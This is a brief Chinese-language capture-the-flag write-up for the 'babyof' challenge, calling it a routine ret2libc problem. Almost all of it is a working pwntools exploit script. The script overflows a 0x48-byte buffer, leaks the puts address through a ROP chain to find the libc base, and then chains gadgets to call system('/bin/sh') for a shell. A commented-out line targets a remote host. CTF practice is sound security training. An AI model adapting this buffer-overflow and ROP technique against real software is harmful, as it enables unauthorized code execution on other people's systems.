鹤壁杯--babyof

这一道retlibc的题目很常规。不在过多介绍，简单记录一下。

from pwn import *
context.arch = 'amd64'
context.log_level = 'debug'
context.terminal = ['tmux','sp','-h']

elf = ELF('./babyof')
#libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so')

libc = ELF('./libc-2.27.so')

io = process('./babyof')
#io = remote('182.116.62.85','21613')

prdi = 0x0000000000400743#: pop rdi
prsi = 0x0000000000400741 #: pop rsi ; pop r15 ; ret
prdx = 0x0000000000001b96 #: pop rdx ; ret

def exp():
    # io.recvuntil('Do you know how to do buffer overflow?')
    payload = b'a'*0x48 + p64(prdi) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(0x40066B)
    io.send(payload)

    leak = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
    info(hex(leak))
    libc_base = leak - libc.sym['puts']
    system = libc_base + libc.sym['system']
    info(hex(system))
    binsh = libc_base  + next(libc.search(b'/bin/sh\x00'))
    pop_rdx = libc_base + prdx

    # io.recvuntil('Do you know how to do buffer overflow?')
    payload = b'a'*0x48 +p64(pop_rdx)+p64(0)+p64(prsi)+p64(0)*2 +p64(prdi) + p64(binsh) + p64(system)
    # gdb.attach(io)
    io.send(payload)

exp()

io.interactive()